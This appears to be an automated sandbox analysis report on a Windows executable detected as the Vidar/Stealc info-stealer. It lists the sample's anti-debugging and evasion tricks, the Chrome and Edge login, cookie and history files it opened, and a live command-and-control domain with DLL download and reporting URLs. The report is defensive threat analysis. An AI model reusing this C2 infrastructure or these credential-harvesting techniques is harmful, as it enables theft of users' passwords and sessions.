Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: DBFIDGII.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: DBFIDGII.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: DBFIDGII.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: DBFIDGII.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`w
Source: DBFIDGII.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware^
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: DBFIDGII.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: DBFIDGII.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: DBFIDGII.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: DBFIDGII.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: DBFIDGII.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: DBFIDGII.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: DBFIDGII.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00417B3E

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

0_2_00416230

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00415DB0 mov eax, dword ptr fs:[00000030h]	0_2_00415DB0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37B13 push dword ptr fs:[00000030h]	0_2_02C37B13
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD6017 mov eax, dword ptr fs:[00000030h]	0_2_02FD6017
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]	0_2_02FC0D90
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]	0_2_02FC092B

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00404C70

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00419DB7 SetUnhandledExceptionFilter,	0_2_00419DB7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417B3E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004173CD
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_61EAF900
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD7634 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_02FD7634
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FDA01E SetUnhandledExceptionFilter,	0_2_02FDA01E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD7DA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_02FD7DA5

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00415CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00415CF0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD5F57 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_02FD5F57

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00414560
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_02FD47C7

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,

0_2_0040B610

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_004143B0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004143B0

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_004144A0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004144A0

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E1307A sqlite3_transfer_bindings,	0_2_61E1307A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D5E6 sqlite3_bind_int64,	0_2_61E2D5E6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D595 sqlite3_bind_double,	0_2_61E2D595
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E0B431 sqlite3_clear_bindings,	0_2_61E0B431
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E037F3 sqlite3_value_frombind,	0_2_61E037F3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64,	0_2_61E2D781
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D714 sqlite3_bind_zeroblob,	0_2_61E2D714
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D68C sqlite3_bind_pointer,	0_2_61E2D68C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D65B sqlite3_bind_null,	0_2_61E2D65B
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D635 sqlite3_bind_int,	0_2_61E2D635
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D9B0 sqlite3_bind_value,	0_2_61E2D9B0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D981 sqlite3_bind_text16,	0_2_61E2D981
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D945 sqlite3_bind_text64,	0_2_61E2D945
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D916 sqlite3_bind_text,	0_2_61E2D916
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D8E7 sqlite3_bind_blob64,	0_2_61E2D8E7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E038CA sqlite3_bind_parameter_count,	0_2_61E038CA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E158CA sqlite3_bind_parameter_index,	0_2_61E158CA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E038DC sqlite3_bind_parameter_name,	0_2_61E038DC
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D8B8 sqlite3_bind_blob,	0_2_61E2D8B8

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.41.44.147	okkolus.com	Russian Federation		56577	ASRELINKRU	true

Contacted Domains

Name	IP	Active
okkolus.com	31.41.44.147	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://okkolus.com/dfaf16606234b71d/softokn3.dll	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://okkolus.com/dfaf16606234b71d/mozglue.dll	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://okkolus.com/dfaf16606234b71d/freebl3.dll	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://okkolus.com/dfaf16606234b71d/vcruntime140.dll	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://okkolus.com/cf5cbdf706840b3f.php	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://okkolus.com/dfaf16606234b71d/msvcp140.dll	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://okkolus.com/dfaf16606234b71d/sqlite3.dll	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://okkolus.com/dfaf16606234b71d/nss3.dll	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://okkolus.com/cf5cbdf706840b3f.php	Avira URL Cloud: Label: malware
Source: http://okkolus.com/cf5cbdf706840b3f.php/M	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}

Multi AV Scanner detection for domain / URL

Source: okkolus.com	Virustotal: Detection: 10%	Perma Link
Source: http://okkolus.com	Virustotal: Detection: 10%	Perma Link
Source: http://okkolus.com/cf5cbdf706840b3f.php	Virustotal: Detection: 13%	Perma Link
Source: http://okkolus.com/dfaf16606234b71d/nss3.dlle	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: FFAk2gixx5.exe	ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe	Virustotal: Detection: 68%			Perma Link

Machine Learning detection for sample

Source: FFAk2gixx5.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: CtIvEWInDoW
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: AgEBOxw
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: OsUse
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: }@@@e$@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: L 45`vy`ty`tx`sp@@@@<@@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: >22lmnopq((\]^_`abcdefghijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: %s\%_
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: %s\%]
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: [EGEKM^Ywxyztasc}567y9n/S
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: jAss}ord
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: '!#!/!#{\|}
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: `o^UFF
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: {K}ri*#
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: HeapFree
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: ntProcessId
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: wininet.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: shell32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: .dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: khrc7C9Pm
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: column_text
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack	String decryptor: login:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00409540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00406C10
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_004094A0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00415590 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00415590
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_0040BF90
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_02FC6E77
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD57F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_02FD57F7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC97A7 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_02FC97A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_02FC9707
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_02FCC1F7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack

Uses 32bit PE files

Source: FFAk2gixx5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040DB60
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040D540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00412570
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D1C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004015C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_004121F0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00411650
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD27D7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FCD7A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD18B7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCB877
